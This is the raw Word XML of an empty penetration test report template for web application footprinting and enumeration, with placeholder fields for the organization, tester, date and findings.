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84303" w14:textId="77777777" w:rsidR="00081E16" w:rsidRDefault="00081E16" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01818C6A" w14:textId="5B2000C1" w:rsidR="00081E16" w:rsidRPr="00F459AF" w:rsidRDefault="00081E16" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F459AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00397A6C" w:rsidRPr="00F459AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Organization</w:t>
      </w:r>
      <w:r w:rsidRPr="00F459AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Logo]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3B7CEA" w14:textId="77E6CB35" w:rsidR="00081E16" w:rsidRPr="00F459AF" w:rsidRDefault="00397A6C" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F459AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[Organization Name]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BD0B0C" w14:textId="77777777" w:rsidR="00397A6C" w:rsidRDefault="00397A6C" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72E5863C" w14:textId="77777777" w:rsidR="00397A6C" w:rsidRDefault="00397A6C" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5894DCBF" w14:textId="77777777" w:rsidR="00397A6C" w:rsidRDefault="00397A6C" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37C97CCD" w14:textId="77777777" w:rsidR="00D46985" w:rsidRDefault="00D46985" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01184E9B" w14:textId="77777777" w:rsidR="00D46985" w:rsidRDefault="00D46985" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49092A9C" w14:textId="77777777" w:rsidR="00D46985" w:rsidRDefault="00D46985" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BC73BF7" w14:textId="1BD08791" w:rsidR="00D46985" w:rsidRPr="00DA4073" w:rsidRDefault="00D46985" w:rsidP="000947B4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  <w:r w:rsidRPr="00DA4073">
        <w:rPr>
          <w:rFonts w:ascii="Rockwell" w:hAnsi="Rockwell"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00DA4073" w:rsidRPr="00DA4073">
        <w:rPr>
          <w:rFonts w:ascii="Rockwell" w:hAnsi="Rockwell"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Title of the Report</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA4073">
        <w:rPr>
          <w:rFonts w:ascii="Rockwell" w:hAnsi="Rockwell"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166D3D6C" w14:textId="77777777" w:rsidR="00DA4073" w:rsidRDefault="00DA4073" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01E38399" w14:textId="77777777" w:rsidR="00DA4073" w:rsidRDefault="00DA4073" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F1781F4" w14:textId="77777777" w:rsidR="00DA4073" w:rsidRDefault="00DA4073" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="386E8306" w14:textId="77777777" w:rsidR="00D91C44" w:rsidRDefault="00D91C44" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AFFB864" w14:textId="77777777" w:rsidR="00D91C44" w:rsidRDefault="00D91C44" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55161B0C" w14:textId="77777777" w:rsidR="00D91C44" w:rsidRDefault="00D91C44" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="606C21AC" w14:textId="77777777" w:rsidR="00D91C44" w:rsidRDefault="00D91C44" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="601AFD2C" w14:textId="77777777" w:rsidR="00D91C44" w:rsidRDefault="00D91C44" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7960BDCB" w14:textId="77777777" w:rsidR="00D91C44" w:rsidRDefault="00D91C44" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28A6D0D2" w14:textId="77777777" w:rsidR="00D91C44" w:rsidRDefault="00D91C44" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D8B2412" w14:textId="77777777" w:rsidR="00D91C44" w:rsidRDefault="00D91C44" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5102A33A" w14:textId="77777777" w:rsidR="00CB4018" w:rsidRDefault="00CB4018" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ECDFA7B" w14:textId="77777777" w:rsidR="00CB4018" w:rsidRDefault="00CB4018" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="113A1B33" w14:textId="77777777" w:rsidR="00CB4018" w:rsidRDefault="00CB4018" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A148BC3" w14:textId="77777777" w:rsidR="00CB4018" w:rsidRDefault="00CB4018" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9216" w:type="dxa"/>
        <w:tblInd w:w="13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662"/>
        <w:gridCol w:w="1961"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="3163"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CB4018" w:rsidRPr="000F3EF2" w14:paraId="6EF2607F" w14:textId="77777777" w:rsidTr="00CB4018">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2662" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p w14:paraId="29F09B28" w14:textId="77777777" w:rsidR="00CB4018" w:rsidRPr="000F3EF2" w:rsidRDefault="00CB4018" w:rsidP="000947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cs="Georgia"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="30"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000F3EF2">
              <w:rPr>
                <w:rFonts w:cs="Georgia"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="30"/>
              </w:rPr>
              <w:t>Penetration Tester:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6554" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E7D1098" w14:textId="77777777" w:rsidR="00CB4018" w:rsidRPr="000F3EF2" w:rsidRDefault="00CB4018" w:rsidP="000947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="Georgia"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="30"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB4018" w:rsidRPr="000F3EF2" w14:paraId="594E35F8" w14:textId="77777777" w:rsidTr="00CB4018">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2662" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p w14:paraId="068C224A" w14:textId="77777777" w:rsidR="00CB4018" w:rsidRPr="000F3EF2" w:rsidRDefault="00CB4018" w:rsidP="000947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cs="Georgia"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="30"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000F3EF2">
              <w:rPr>
                <w:rFonts w:cs="Georgia"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="30"/>
              </w:rPr>
              <w:t>Date:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1961" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="490C31D8" w14:textId="77777777" w:rsidR="00CB4018" w:rsidRPr="000F3EF2" w:rsidRDefault="00CB4018" w:rsidP="000947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cs="Georgia"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="30"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p w14:paraId="73E117D0" w14:textId="77777777" w:rsidR="00CB4018" w:rsidRPr="000F3EF2" w:rsidRDefault="00CB4018" w:rsidP="000947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="Georgia"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="30"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000F3EF2">
              <w:rPr>
                <w:rFonts w:cs="Georgia"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="30"/>
              </w:rPr>
              <w:t>Location:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3163" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D5B796E" w14:textId="77777777" w:rsidR="00CB4018" w:rsidRPr="000F3EF2" w:rsidRDefault="00CB4018" w:rsidP="000947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="Georgia"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="30"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1804ED34" w14:textId="780EE437" w:rsidR="00BD141A" w:rsidRPr="00253467" w:rsidRDefault="007E0E11" w:rsidP="00253467">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6751D2B6" w14:textId="2386E397" w:rsidR="008864EE" w:rsidRPr="008864EE" w:rsidRDefault="008864EE" w:rsidP="008864EE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00551BBD">
        <w:lastRenderedPageBreak/>
        <w:t>Test 1: Web Application Footprinting and Enumeration Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F33A032" w14:textId="7B5BAFAC" w:rsidR="00556444" w:rsidRDefault="001C1A4E" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0015358A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00F86E2C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidR="0015358A" w:rsidRPr="0015358A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>This section</w:t>
      </w:r>
      <w:r w:rsidR="00D945D8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00383047">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">includes various types of </w:t>
      </w:r>
      <w:r w:rsidR="0096096B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>techniques</w:t>
      </w:r>
      <w:r w:rsidR="00383047">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> that can be used </w:t>
      </w:r>
      <w:r w:rsidR="0015358A" w:rsidRPr="0015358A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>for identifying and gathering essential information about the target web application</w:t>
      </w:r>
      <w:r w:rsidR="0024607C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0015358A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDB1186" w14:textId="77777777" w:rsidR="005A2B29" w:rsidRDefault="005A2B29" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr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0947B4" w:rsidRPr="00A51A96" w14:paraId="1F0BDB83" w14:textId="77777777" w:rsidTr="00742948">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="1916E996" w14:textId="77777777" w:rsidR="000947B4" w:rsidRPr="003C713F" w:rsidRDefault="000947B4" w:rsidP="0085194C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1.1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423301">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Identify Functionality</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2457FB9E" w14:textId="77777777" w:rsidR="00276BD7" w:rsidRPr="00F4334D" w:rsidRDefault="00276BD7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271"/>
        <w:gridCol w:w="3735"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB7128" w:rsidRPr="00DB7128" w14:paraId="68FA4309" w14:textId="77777777" w:rsidTr="002F116D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75B073F" w14:textId="77777777" w:rsidR="00DB7128" w:rsidRPr="00DB7128" w:rsidRDefault="00DB7128" w:rsidP="002F116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A31F112" w14:textId="77777777" w:rsidR="00DB7128" w:rsidRPr="00DB7128" w:rsidRDefault="00DB7128" w:rsidP="00DB7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B7128" w:rsidRPr="00DB7128" w14:paraId="55DB1D1F" w14:textId="77777777" w:rsidTr="002F116D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3EAA814" w14:textId="77777777" w:rsidR="00DB7128" w:rsidRPr="00DB7128" w:rsidRDefault="00DB7128" w:rsidP="002F116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C3EF21D" w14:textId="77777777" w:rsidR="00DB7128" w:rsidRPr="00DB7128" w:rsidRDefault="00DB7128" w:rsidP="00DB7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B7128" w:rsidRPr="00DB7128" w14:paraId="35BAEB81" w14:textId="77777777" w:rsidTr="002F116D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1F91F41" w14:textId="77777777" w:rsidR="00DB7128" w:rsidRPr="00DB7128" w:rsidRDefault="00DB7128" w:rsidP="002F116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D30D727" w14:textId="77777777" w:rsidR="00DB7128" w:rsidRPr="00DB7128" w:rsidRDefault="00DB7128" w:rsidP="00DB7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B7128" w:rsidRPr="00DB7128" w14:paraId="0147E284" w14:textId="77777777" w:rsidTr="002F116D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EE982C3" w14:textId="77777777" w:rsidR="00DB7128" w:rsidRPr="00DB7128" w:rsidRDefault="00DB7128" w:rsidP="002F116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Examined the Core Functionality </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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F4A56F2" w14:textId="77777777" w:rsidR="00DB7128" w:rsidRPr="00DB7128" w:rsidRDefault="00DB7128" w:rsidP="00DB7128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DB7128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73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1F64F2B" w14:textId="77777777" w:rsidR="00DB7128" w:rsidRPr="00DB7128" w:rsidRDefault="00DB7128" w:rsidP="00DB7128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DB7128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DB7128" w:rsidRPr="00DB7128" w14:paraId="01CE86BC" w14:textId="77777777" w:rsidTr="002F116D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DC996C7" w14:textId="7B9D3F1D" w:rsidR="00DB7128" w:rsidRPr="00DB7128" w:rsidRDefault="00826EAA" w:rsidP="002F116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Visible Functionalities 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9AA2C4E" w14:textId="77777777" w:rsidR="00DB7128" w:rsidRPr="00DB7128" w:rsidRDefault="00DB7128" w:rsidP="00DB7128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07293BD" w14:textId="77777777" w:rsidR="00DB7128" w:rsidRPr="00DB7128" w:rsidRDefault="00DB7128" w:rsidP="00DB7128">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="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948B72E" w14:textId="77777777" w:rsidR="00DB7128" w:rsidRPr="00DB7128" w:rsidRDefault="00DB7128" w:rsidP="00D81ABF">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="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5A83A39" w14:textId="77777777" w:rsidR="00DB7128" w:rsidRPr="00DB7128" w:rsidRDefault="00DB7128" w:rsidP="00DB7128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B7128" w:rsidRPr="00DB7128" w14:paraId="3EDFFCF8" w14:textId="77777777" w:rsidTr="002F116D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B138E98" w14:textId="77777777" w:rsidR="00DB7128" w:rsidRPr="00DB7128" w:rsidRDefault="00DB7128" w:rsidP="002F116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Key Security Mechanisms in an Application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852552E" w14:textId="77777777" w:rsidR="00DB7128" w:rsidRPr="00DB7128" w:rsidRDefault="00DB7128" w:rsidP="00DB712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99AAF23" w14:textId="77777777" w:rsidR="00DB7128" w:rsidRPr="00DB7128" w:rsidRDefault="00DB7128" w:rsidP="00DB7128">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="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E10AB9C" w14:textId="77777777" w:rsidR="00DB7128" w:rsidRPr="00DB7128" w:rsidRDefault="00DB7128" w:rsidP="00D81ABF">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="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094286F" w14:textId="77777777" w:rsidR="00DB7128" w:rsidRPr="00DB7128" w:rsidRDefault="00DB7128" w:rsidP="00DB7128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46F55" w:rsidRPr="00DB7128" w14:paraId="799741F0" w14:textId="77777777" w:rsidTr="002F116D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E499009" w14:textId="4C1AC133" w:rsidR="00746F55" w:rsidRPr="00DB7128" w:rsidRDefault="00B6041E" w:rsidP="002F116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Types of Links Examined (Internal/ External)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727B6A8" w14:textId="77777777" w:rsidR="00746F55" w:rsidRPr="00DB7128" w:rsidRDefault="00746F55" w:rsidP="00746F5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41499" w:rsidRPr="00DB7128" w14:paraId="6CF95B08" w14:textId="77777777" w:rsidTr="002F116D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4815A8C" w14:textId="73AF1FFC" w:rsidR="00A41499" w:rsidRDefault="00A41499" w:rsidP="002F116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Any Approach Followed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17B9469" w14:textId="77777777" w:rsidR="00A41499" w:rsidRPr="00DB7128" w:rsidRDefault="00A41499" w:rsidP="00746F5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B7128" w:rsidRPr="00DB7128" w14:paraId="6237861E" w14:textId="77777777" w:rsidTr="002F116D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1F89D59" w14:textId="77777777" w:rsidR="00DB7128" w:rsidRPr="00DB7128" w:rsidRDefault="00DB7128" w:rsidP="002F116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712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9B91E59" w14:textId="77777777" w:rsidR="00DB7128" w:rsidRPr="00DB7128" w:rsidRDefault="00DB7128" w:rsidP="00DB7128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DCE0CF5" w14:textId="77777777" w:rsidR="00DB7128" w:rsidRPr="00DB7128" w:rsidRDefault="00DB7128" w:rsidP="00DB7128">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="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D1F8185" w14:textId="77777777" w:rsidR="00DB7128" w:rsidRPr="00DB7128" w:rsidRDefault="00DB7128" w:rsidP="00D81ABF">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="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CB8A24F" w14:textId="77777777" w:rsidR="00DB7128" w:rsidRPr="00DB7128" w:rsidRDefault="00DB7128" w:rsidP="00DB7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3DF98B2D" w14:textId="02506979" w:rsidR="00B63D59" w:rsidRDefault="00B63D59" w:rsidP="006C7762">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:before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76742911" w14:textId="77777777" w:rsidR="000F0611" w:rsidRPr="000F0611" w:rsidRDefault="000F0611" w:rsidP="006C7762">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:before="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="auto"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D4EC8" w14:paraId="0DA77A56" w14:textId="77777777" w:rsidTr="005D4EC8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A45DB19" w14:textId="77777777" w:rsidR="005D4EC8" w:rsidRDefault="005D4EC8" w:rsidP="006C7762">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="120"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="607C4E1A" w14:textId="77777777" w:rsidR="005D4EC8" w:rsidRDefault="005D4EC8" w:rsidP="006C7762">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="120"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4C951084" w14:textId="77777777" w:rsidR="00F4334D" w:rsidRDefault="00F4334D" w:rsidP="006C7762">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="120"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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DC26C7" w:rsidRPr="00A51A96" w14:paraId="033E8137" w14:textId="77777777" w:rsidTr="00F4334D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="03A59B2B" w14:textId="4CCCD1C9" w:rsidR="00DC26C7" w:rsidRPr="00A51A96" w:rsidRDefault="00DC26C7" w:rsidP="0085194C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  <w:color w:val="auto"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1.2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D04E7B">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">Perform </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04E7B">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">ebsite </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>F</w:t>
            </w:r>
            <w:r w:rsidRPr="00D04E7B">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">ootprinting </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B2D1E08" w14:textId="77777777" w:rsidR="00DC26C7" w:rsidRPr="00DA197D" w:rsidRDefault="00DC26C7" w:rsidP="00B63D59">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:before="120" w:after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D62B99" w:rsidRPr="00D62B99" w14:paraId="15C411BA" w14:textId="77777777" w:rsidTr="00643A1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323EB3B" w14:textId="77777777" w:rsidR="00D62B99" w:rsidRPr="00D62B99" w:rsidRDefault="00D62B99" w:rsidP="00643A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62B99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3403EDBC" w14:textId="77777777" w:rsidR="00D62B99" w:rsidRPr="00D62B99" w:rsidRDefault="00D62B99" w:rsidP="00D62B9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62B99" w:rsidRPr="00D62B99" w14:paraId="7AD21AFC" w14:textId="77777777" w:rsidTr="00643A1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DE8CA8A" w14:textId="77777777" w:rsidR="00D62B99" w:rsidRPr="00D62B99" w:rsidRDefault="00D62B99" w:rsidP="00643A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62B99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06AECBEE" w14:textId="77777777" w:rsidR="00D62B99" w:rsidRPr="00D62B99" w:rsidRDefault="00D62B99" w:rsidP="00D62B9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62B99" w:rsidRPr="00D62B99" w14:paraId="26F32705" w14:textId="77777777" w:rsidTr="00643A1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9623838" w14:textId="77777777" w:rsidR="00D62B99" w:rsidRPr="00D62B99" w:rsidRDefault="00D62B99" w:rsidP="00643A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62B99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shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7813B427" w14:textId="77777777" w:rsidR="00D62B99" w:rsidRPr="00D62B99" w:rsidRDefault="00D62B99" w:rsidP="00D62B9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62B99" w:rsidRPr="00D62B99" w14:paraId="67BB6F6C" w14:textId="77777777" w:rsidTr="00643A1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92C9F31" w14:textId="3A27E799" w:rsidR="00D62B99" w:rsidRPr="00D62B99" w:rsidRDefault="00541475" w:rsidP="00643A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41475">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Background Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
